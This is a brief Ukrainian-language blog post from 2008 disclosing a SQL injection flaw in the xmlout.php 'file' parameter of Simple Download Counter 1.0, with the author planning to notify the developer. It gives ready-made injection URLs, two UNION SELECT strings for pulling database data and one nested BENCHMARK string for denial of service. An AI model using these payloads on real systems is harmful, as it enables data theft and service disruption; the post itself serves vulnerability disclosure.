SQL Injection уразливість в Simple Download Counter
23:57 17.09.2008Сьогодні я знайшов SQL Injection уразливість в Simple Download Counter. Як раз коли досліджував даний додаток. Про що найближчим часом повідомлю розробнику веб додатку.
SQL Injection:
Дірку можна використати як для отримання інформації (зокрема інших веб додатків) з БД:
http://site/xmlout.php?file='%20union%20select%20*%20from%20table/*
http://site/xmlout.php?file='%20union%20select%201,1%20from%20table/*
Так і для проведення DoS атак:
http://site/xmlout.php?file='%20and%20benchmark(10000000,benchmark(10000000,md5(now())))/*
Атака можлива при magic quotes off. Уразлива версія Simple Download Counter 1.0.